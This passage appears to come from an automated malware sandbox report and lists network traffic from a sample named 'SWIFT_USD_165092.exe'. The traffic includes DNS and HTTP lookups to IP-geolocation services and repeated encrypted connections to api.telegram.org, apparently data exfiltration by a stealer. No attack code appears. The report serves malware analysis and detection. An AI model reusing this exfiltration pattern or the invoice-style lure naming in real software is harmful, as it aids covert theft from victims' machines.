                                                                                      May 22, 2023 19:50:27.945822001 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945837021 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945929050 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945941925 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946026087 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946042061 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946134090 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946146011 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946239948 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946252108 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946337938 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946353912 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946448088 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946463108 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946535110 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946546078 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946641922 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946654081 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946755886 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946768999 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946839094 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946851015 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.946948051 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.946959019 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.947051048 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.947063923 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.947151899 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.947164059 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.947271109 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.947283983 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.947530985 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.947773933 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.947906017 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.948048115 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.948196888 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.988290071 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.988640070 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.988724947 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.988816023 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.988893986 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.988980055 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.996788025 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.997392893 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.997438908 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.997498035 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.997589111 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.997670889 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.997754097 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.997818947 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.023484945 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.023822069 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.023849964 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.023978949 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.024000883 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.024118900 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.024130106 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.024250031 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.024350882 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.024466038 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.024547100 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.046634912 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:28.046750069 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:28.048568010 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.048631907 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.075658083 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.432652950 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.432780027 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:28.432957888 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:28.434058905 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:34.711292028 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:37.745038033 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:37.894687891 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:37.894788027 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:38.269848108 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:38.419765949 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:38.420283079 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:38.461994886 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.462038040 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.462110996 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.477859974 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.477888107 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.557627916 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:38.780670881 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.780765057 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.784622908 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.784651041 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.785032034 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.854499102 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.234462976 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.276293039 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:46.435561895 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:46.435781956 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:46.435862064 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.436676025 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.786431074 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:46.941960096 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:47.058326960 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:33.346762896 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:33.540015936 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:34.213435888 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:34.360059023 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:34.362384081 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:34.421899080 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.421977997 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.422117949 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.422976971 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.423011065 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.493760109 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.494033098 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.497045994 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.497091055 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.497454882 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.499669075 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.544313908 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.550889015 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:34.618011951 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.618119955 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.618231058 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.619126081 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.675589085 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.675658941 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.676084995 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.684134007 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.684169054 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.750828028 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.847636938 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.151938915 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.152106047 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.152426958 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:45.197909117 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.198843002 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.198883057 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.200066090 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.200086117 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.200172901 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.200191975 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.200257063 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.200268030 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.210390091 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.210442066 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.210944891 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.210968971 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.210988045 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.210999012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.211039066 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.211052895 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.211070061 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.211080074 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.211179018 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.211190939 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.212343931 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.212372065 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.212418079 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.212438107 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.218646049 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.218678951 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.220691919 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.220726013 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.220820904 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.220844984 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.221981049 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.222012997 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.222058058 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.222081900 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.234966040 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235012054 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235053062 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235074997 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235100985 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235121012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235157013 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235193968 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235224009 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235248089 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235270023 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235291004 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235316038 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235332012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.236108065 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.236139059 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.237133980 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.237170935 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.237276077 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.237293959 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.237324953 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.237338066 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.241898060 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.241924047 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242072105 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242085934 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242182970 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242198944 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242273092 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242289066 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242374897 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242389917 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.243043900 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243232965 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243366003 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243485928 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243591070 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.244754076 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.244951010 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.252923012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.253055096 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.296322107 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.300129890 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:45.300236940 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:45.849107981 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.849301100 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.849427938 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.855576038 CEST49727443192.168.2.5149.154.167.220

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 22, 2023 19:49:51.921468019 CEST6145253192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:51.942271948 CEST53614528.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:49:51.973365068 CEST6532353192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:51.993510008 CEST53653238.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:49:52.336992979 CEST5148453192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:52.363151073 CEST53514848.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:49:57.171255112 CEST6344653192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:57.199857950 CEST53634468.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:27.063637972 CEST5503953192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:27.086931944 CEST53550398.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:34.611637115 CEST5506853192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:34.637907982 CEST53550688.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:34.649491072 CEST5668253192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:34.675643921 CEST53566828.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:38.433897972 CEST5853253192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:38.459300995 CEST53585328.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:46.969841957 CEST6265953192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:46.990375996 CEST53626598.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:51:34.396444082 CEST5858153192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:51:34.419713020 CEST53585818.8.8.8192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      May 22, 2023 19:49:51.921468019 CEST192.168.2.58.8.8.80xc38Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.973365068 CEST192.168.2.58.8.8.80x3080Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:52.336992979 CEST192.168.2.58.8.8.80xed73Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:57.171255112 CEST192.168.2.58.8.8.80xa587Standard query (0)245.246.1.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                      May 22, 2023 19:50:27.063637972 CEST192.168.2.58.8.8.80x14a0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.611637115 CEST192.168.2.58.8.8.80x5aedStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.649491072 CEST192.168.2.58.8.8.80x5a6bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:38.433897972 CEST192.168.2.58.8.8.80xc86cStandard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:46.969841957 CEST192.168.2.58.8.8.80xfa79Standard query (0)245.246.1.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                      May 22, 2023 19:51:34.396444082 CEST192.168.2.58.8.8.80xd318Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      May 22, 2023 19:49:51.942271948 CEST8.8.8.8192.168.2.50xc38No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.942271948 CEST8.8.8.8192.168.2.50xc38No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.942271948 CEST8.8.8.8192.168.2.50xc38No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.942271948 CEST8.8.8.8192.168.2.50xc38No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.993510008 CEST8.8.8.8192.168.2.50x3080No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.993510008 CEST8.8.8.8192.168.2.50x3080No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.993510008 CEST8.8.8.8192.168.2.50x3080No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:51.993510008 CEST8.8.8.8192.168.2.50x3080No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:52.363151073 CEST8.8.8.8192.168.2.50xed73No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:52.363151073 CEST8.8.8.8192.168.2.50xed73No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:52.363151073 CEST8.8.8.8192.168.2.50xed73No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:49:57.199857950 CEST8.8.8.8192.168.2.50xa587Name error (3)245.246.1.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                      May 22, 2023 19:50:27.086931944 CEST8.8.8.8192.168.2.50x14a0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.637907982 CEST8.8.8.8192.168.2.50x5aedNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.637907982 CEST8.8.8.8192.168.2.50x5aedNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.637907982 CEST8.8.8.8192.168.2.50x5aedNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.637907982 CEST8.8.8.8192.168.2.50x5aedNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.675643921 CEST8.8.8.8192.168.2.50x5a6bNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.675643921 CEST8.8.8.8192.168.2.50x5a6bNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.675643921 CEST8.8.8.8192.168.2.50x5a6bNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:34.675643921 CEST8.8.8.8192.168.2.50x5a6bNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:38.459300995 CEST8.8.8.8192.168.2.50xc86cNo error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:38.459300995 CEST8.8.8.8192.168.2.50xc86cNo error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:38.459300995 CEST8.8.8.8192.168.2.50xc86cNo error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                      May 22, 2023 19:50:46.990375996 CEST8.8.8.8192.168.2.50xfa79Name error (3)245.246.1.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                      May 22, 2023 19:51:34.419713020 CEST8.8.8.8192.168.2.50xd318No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • ipapi.co
                                                                                      • api.telegram.org
                                                                                      • api.ipify.org

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.549716172.67.69.226443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.549718149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.549719149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.549725172.67.69.226443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.549726149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.549727149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.549715173.231.16.7680C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 22, 2023 19:49:52.181873083 CEST96OUTGET / HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive
                                                                                      May 22, 2023 19:49:52.331671953 CEST97INHTTP/1.1 200 OK
                                                                                      Content-Length: 11
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 22 May 2023 17:49:52 GMT
                                                                                      Vary: Origin
                                                                                      Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
                                                                                      Data Ascii: 84.17.52.45
                                                                                      May 22, 2023 19:49:55.058192968 CEST103OUTGET / HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      May 22, 2023 19:49:56.102094889 CEST104INHTTP/1.1 200 OK
                                                                                      Content-Length: 11
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 22 May 2023 17:49:55 GMT
                                                                                      Vary: Origin
                                                                                      May 22, 2023 19:49:56.158345938 CEST104INData Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
                                                                                      Data Ascii: 84.17.52.45
                                                                                      May 22, 2023 19:50:26.651664972 CEST115OUTGET / HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      May 22, 2023 19:50:27.038357973 CEST116INHTTP/1.1 200 OK
                                                                                      Content-Length: 11
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 22 May 2023 17:50:26 GMT
